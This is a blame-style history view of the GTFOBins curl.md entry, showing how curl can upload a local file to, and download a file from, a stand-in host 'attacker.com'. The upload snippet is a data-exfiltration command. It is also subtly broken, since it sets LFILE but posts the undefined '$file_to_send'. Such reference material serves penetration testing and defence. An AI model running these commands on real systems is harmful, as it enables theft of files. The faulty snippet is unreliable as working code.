GTFOBins.github.io/_gtfobins/curl.md

16 lines
457 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
upload:
2018-05-25 19:57:26 +02:00
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
2018-05-21 21:14:41 +02:00
code: |
2018-05-24 21:59:21 +02:00
URL=http://attacker.com/
2018-05-21 21:14:41 +02:00
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
2018-05-24 21:59:21 +02:00
code: |
URL=http://attacker.com/file_to_get
LFILE=where_to_save
2018-05-21 21:14:41 +02:00
curl $URL -o $LFILE
2018-05-25 01:10:39 +02:00
---